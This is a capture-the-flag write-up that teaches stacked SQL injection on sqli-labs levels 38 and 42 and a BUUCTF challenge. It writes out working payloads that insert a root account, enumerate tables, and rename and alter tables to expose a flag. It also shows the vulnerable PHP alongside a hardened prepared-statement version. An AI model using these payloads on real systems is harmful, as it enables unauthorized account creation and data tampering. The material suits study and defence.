Stacked injection in SQL injection


I did a web challenge on BUUCTF that involves stacked injection, so let's learn it.

A SQL statement ends with `;`. If we append another SQL statement after that `;`, will both statements be executed together? That is the idea behind stacked injection (stacked queries).

The simplest example: `select * from users; DELETE FROM test`

This first queries the users table and then runs `DELETE FROM test`, which deletes the rows of the test table.

Let's try it in practice.

Target range: sqli-labs 38

First determine the closing character, which is `'`.

Construct the payload: `?id=1' order by 4 %23`

The number of columns is determined to be 3.

Level 38 can be treated as blind injection: whether the second statement succeeds or fails is not echoed back to us.

OK, let's construct the payload first: `?id=-1'; insert into users(id,username,password) values(88,'aaa','bbb')%23`

The page shows nothing, so let's check the database.

The last row, username aaa, password bbb, has been inserted successfully.

If we insert an administrator account and password instead, what would the result be?

This level does not show much, so let's try level 42.

sqli-labs 42

Because aaa was inserted just now, we can construct the login payload directly.

① username: `aaa';insert into users(id,username,password) values(60,'root','root')#`
password: `bbb`

I checked the database and found that the insert did not succeed, even though the statement is correct. The username is probably filtered or otherwise protected.

② username: `aaa`
password: `bbb';insert into users(id,username,password) values(60,'root','root')#`

Try stacking in the password instead.

Login successful

Check the database

Inserted successfully

Let's look at the source code of level 42:

```php
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
```

The username is escaped, but the password is taken straight from POST, which allows stacked injection.
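As an added example (not sqli-labs' own code), here is the level-42 login pattern next to a hardened version. It assumes a mysqli link `$con1` and a `users` table whose `password` column, in the hardened version, holds `password_hash()` output; the function names are hypothetical.

```php
<?php
// Added example, not from sqli-labs. Assumes a mysqli link $con1 and a `users`
// table; in the hardened version the password column holds password_hash() output.

// VULNERABLE (the level-42 pattern): only the username is escaped, and the query
// is sent through mysqli_multi_query(), so a ';' inside the password ends the
// SELECT and everything after it runs as a second statement.
function login_vulnerable(mysqli $con1, string $user, string $pass): bool
{
    $username = mysqli_real_escape_string($con1, $user);
    $password = $pass; // taken from POST as-is, exactly as in the level-42 source
    $sql = "SELECT * FROM users WHERE username='$username' AND password='$password'";
    if (!mysqli_multi_query($con1, $sql)) {
        return false;
    }
    $result = mysqli_store_result($con1);          // result set of the first statement
    $found  = $result !== false && mysqli_num_rows($result) > 0;
    if ($result !== false) {
        mysqli_free_result($result);
    }
    // any stacked statements have already been executed; just drain their results
    while (mysqli_more_results($con1) && mysqli_next_result($con1)) {
        if (($extra = mysqli_store_result($con1)) !== false) {
            mysqli_free_result($extra);
        }
    }
    return $found;
}

// HARDENED: a prepared statement sends query text and data separately, so neither
// value can close the quote or start a new statement, and mysqli_prepare()
// accepts exactly one statement, so stacking is impossible by construction.
function login_hardened(mysqli $con1, string $user, string $pass): bool
{
    $stmt = mysqli_prepare($con1, "SELECT password FROM users WHERE username = ? LIMIT 1");
    if ($stmt === false) {
        return false;
    }
    mysqli_stmt_bind_param($stmt, "s", $user);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $storedHash);
    $ok = mysqli_stmt_fetch($stmt) === true && password_verify($pass, (string) $storedHash);
    mysqli_stmt_close($stmt);
    return $ok;
}
```

With `login_vulnerable`, the level-42 password payload `bbb';insert into users(...)#` matches the earlier `aaa`/`bbb` row and also runs the INSERT; with `login_hardened`, the same string is compared as a plain password and nothing else executes.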

Another example

[ 2019] Random injection

First check whether there is an injection point: try `1'`

Injection point found

Then determine the number of columns


Using `1'union select 1,database();#` gives an error.

Keywords such as select are filtered, so normal union injection cannot be used, and error-based injection cannot be used either!

Looking at the master's writeup, let's try stacked injection.

First construct the payload: `1';show databases;#`

View the databases

Construct the payload `1';show tables;#` to see the tables

Only two tables
From the two tables, we then query the columns
Construct the payload: `0';show columns from words;#`

The flag we want is not there.

Then construct the payload:

`` 0';show columns from `1919810931114514`;# ``

I forgot to quote the numeric table name before and tried n times without success! Only after adding the quoting did I realise how ignorant I was and how much time I had wasted!!!

Found the flag column; the next step is how to get it echoed.

From the picture above, we know the regular expression filters many keywords, but not alter and rename.

① First rename the words table to words1

② Rename the 1919810931114514 table to words

③ Change the flag field to id

Construct the payload:

```sql
0';RENAME TABLE `words` TO `words1`;RENAME TABLE
 `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag`
 `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci
 NOT NULL;show columns from words;#
```

This should succeed.

Hmm, check with `1';show tables;#`

Modified successfully

Query with `0'or '1'='1`

Get the flag
